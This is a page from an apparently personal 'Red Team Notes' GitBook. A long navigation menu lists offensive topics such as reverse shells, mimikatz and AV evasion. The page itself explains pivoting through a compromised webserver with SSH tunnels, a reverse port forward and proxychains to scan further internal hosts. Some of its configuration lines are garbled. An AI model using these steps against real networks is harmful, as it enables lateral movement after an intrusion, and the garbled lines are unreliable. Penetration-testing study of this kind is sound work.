Red Team Notes
1.0.0
1.0.0
  • Introduction
  • PowerShell
    • find_files_by_name
    • powershell_web_access
    • enable_psremoting
    • powershell_sans_cheat
    • powerup_-_privilege_escalation
    • user_enumeration
    • powershell_-_quickies
    • constrained_language_breakout
    • powershell_-_get-system
    • domain_enumeration
    • powershell
    • random_powershell
  • mainframe
    • tso_commands
    • nmap_stuff_-_recon
  • Links and Random
    • Commands--mount-shares
    • Commands--responder
    • Commands--nac_testing
    • trash
    • Commands--nessus-openvas
    • Commands--named_pipes
    • ptx
    • Commands--mortar-shells
    • Redis-Cheatsheet
    • wifi_driver_stuff
    • bypassing_applocker_living_off_land
    • Commands--remote_and_local_file_inclusion
    • Commands--netcat-ftp
    • mimikatz
  • wifi-hacking
    • eaphammer
    • aircrack-ng_and_jtr_attack
    • new_page
    • cracking_wpa_attack
    • aircrack-ng
    • wifite
    • basics
    • hostapd
    • cowpatty_attack
    • rogue_access_point
    • cracking_wep_via_a_client_attack
    • handshake-via-pcap
    • clientless_wep_attack
    • fluxion
    • reaver
    • crack_wep
    • pyrit_attack
    • wep_shared_key_authentication_attack
  • mobile
    • qark
    • dex2jar
    • jd-gui
    • mobile
    • baby_steps
    • apktool
    • smali_and_baksmali
  • Cobalt-Strike
    • apache_rewrite_.htaccess
    • playbook
      • mail_and_smtp_enumeration-manipulation
      • lateral_movement
      • overpass_the_hash_with_rubeus-beacon_-_h
      • persistence
      • privilege_escalation
      • after_initial_access
    • situational_awareness_-_harmj0y
    • malleable
    • sid_hopping
    • generating_certificates
    • safety
    • random_commands
    • golden_ticket
    • go_daddy_domain
    • github_repos
    • malware_av_evasion
    • malware_av_evasion--main.go
    • c2_infrastructure
    • cobalt_strike_certificates
    • cpl_resource_runner_payload
  • Metasploit
    • nessus
    • network
    • meterpreter
  • Information Gathering Enumeration
    • 35 Searchsploit
    • 30 Find
    • 21 WinRM
    • 50 Gobuster
    • Enumeration by Port Number
    • 40 Active Directory
    • Linux Prevesc
    • pivoting
    • 20 Reconnoitre
    • Kerberos cheatsheet
    • 11 SMB Part 1
    • 00 ENUMERATION
    • 10 Nmap
    • 12-check-for-anonymous-smb
    • bruteforcing
    • 60 DNS Enumeration
    • 15 Firefox
  • Commands
    • rbash
    • tools-sources
    • tar
    • network-change-ip
    • sed_and_changing_files_for_malware_evasi
    • web_discovery
    • xxd
    • droopescan
    • c#
    • proxychains-admin-network
    • de-duplicate
    • privilege-escalation-windows_-_and_empir
    • ping_sweep
    • wget
    • snmp
    • custom-payloads
    • python
    • curl-wget
    • proxychains
    • goddi_-_domain_enumeration
    • nginx-bypass
    • outlook_and_owa
    • physical_hacking--rasperry_pi
    • have_a_shell
    • xml-xxe-xpath
    • xss-iframe
    • port-forward
    • physical_hacking
    • pack
    • client-side-iframe-attack
    • waf
    • laps
    • images-with-files-in-them
    • fresh-install
    • privilege-escalation-linux
    • masscan
    • arp-spoof
    • shellshock-squid
    • merlin
    • redis
    • get-browserdata
    • lateral_movement
    • smb-netbios-rpc
    • password-cracking
    • virtual-box_guest_additions
    • host_discovery-dns
    • certificate_tls_and_ssl
    • postgresql
    • physical_hacking--bash_bunny
    • powerview--new_page
    • mail_sniper
    • searchsploit
    • crackmapexec
    • user_agent
    • lolbins
    • files-inside-of-pictures
    • random_shellcode_-_scratch-pad
    • linux
    • ports
    • block-ip-iptables
    • httpscreenshot
    • dnscat
    • wp-scan
    • gather-gpp-creds
    • group-policy-decrypt-passwords
    • buffer-overflow
    • mac_address_change
    • sql
    • compiling-code
    • shell-for-buffer-overflow
    • hex_encode_command_line
    • spawn_a_better_shell_-_break_out_of_shit
    • nikto-proxy
    • osint
    • assembly
    • sshuttle
    • nmap_and_scanning
    • root_user_add
    • pass_the_hash
    • test-for-xxe
    • payloads
    • webdav
    • cut_commands
    • unicorn_scan
    • rdesktop_and_screen_for_linux
    • spooler_exploit
    • dns-zone-transfer
    • ssh
    • password-grep
  • reverse-shell-one-liners
    • ruby
    • c-language-reverse-shell
    • reverse_shell_one_liners
    • perl-reverse-shell-cgi-format
    • java_reverse_shell
    • python_reverse_shell
  • Bypass-Applocker
    • vbs_macro
    • pubprn.vbs
    • demiguise
    • mshta
    • regsvcs
    • regasm_2
    • bypass-uac
    • installutil
  • windows
    • uninstall_patches
    • passwords
    • powerview_3.0,_harmj0y
    • port_forward
    • powerview_acl_enum-abuse
    • powerview,_enumerate_groups-ac
    • search_4_loot
    • firewall
    • laps_abuse
    • enumeration
    • Windows
    • Windows_service_abuse
    • Windows Enumeration
  • mimikatz
    • mimikatz_list_modules
    • list_commands_in_module
    • mimikatz
    • remote_control_rpc
    • applocker_bypass_and_other_sn
    • mimikatz_-_start_and_stop_processes
    • base64_all_the_things
    • rdp
    • avoid_new_events
    • mimikatz_-_tokens
  • red-team
    • privilege_escalation_across_trusts
    • file_servers_and_files
    • lateral_movement
    • Commands--red_team
    • forest_enumeration
    • persistence_techniques
    • privilege_escalation
  • Start Procedure
    • Start-Procedure
  • Tools to add to Kali Linux
  • AD-notes
    • more-ad-notes
    • bloodhound
    • ad-notes-chirag
    • enumeration
    • pam_abuse
    • laps_abuse
    • domain_privilege_escalation
    • active_directory_one_liners
  • Setting up Kali Linux
    • Tools to add to Kali Linux
    • Items to Install in Kali
      • tmux
        • tmux_config
        • Setup_-_TMUX
        • tmux_cheat_sheet
      • crontab
      • rclone
      • Items_to_install_in_Kali
    • Tools to install
  • SQL
    • abusing_sql_server_trusts--privilege_escalation
    • abusing_sql_server_trusts
    • abusing_sql_server_trusts--post_exploitation_enumeration
    • 31 SQL
  • tools to install
  • command line
  • simple note
  • Enumeration
  • Tools to install on Windows
  • temp-readme
Powered by GitBook
On this page
  • configure proxychains
  • add proxy here ...
  • socks4 10.1.1.246 80
  • socks4 10.1.1.246 22sean/dev/null
  • meanwile
  • defaults set to "tor"
  • socks4 127.0.0.1 9050 <--under this line put "socks4127.0.0.1 8080" <--this will use port 8080

Was this helpful?

  1. Commands

proxychains

PROXYCHAINS

configure proxychains

edit the file proxychains.conf

leafpad /etc/proxychains.conf -- at the bottom you will see

this is an example of what you type into your own machine to create a dynamic ssh tunnel ssh -D 127.0.0.1:8080 sean@192.168.31.251

[ProxyList]

add proxy here ...

socks4 10.1.1.246 80

socks4 10.1.1.246 22sean/dev/null

meanwile

defaults set to "tor"

socks4 127.0.0.1 9050 <--under this line put "socks4127.0.0.1 8080" <--this will use port 8080

on the machine that is being attacked, use the following commands

ssh -f -N -R 2222:127.0.0.1:22 @ ^^^^^^^^^^^ This is the localhost IP of the webserver you hacked and will use to attack other machines. The command will create the port forwarding shit

With your machine connecting to the machine you already compromised, you can now use proxychains to attack other machines in the network of the computer you compromised.

I.E.

proxychains nmap -T5 --top-ports=20 -sT -Pn 10.1.1.236

ssh -D 127.0.0.1:8080 sean@192.168.31.251 <--your machine ssh -f -N -R 2222:127.0.0.1:22 root@192.168.30.53 <-----webserver you use to pivot

Previouscurl-wgetNextgoddi_-_domain_enumeration

Last updated 3 years ago

Was this helpful?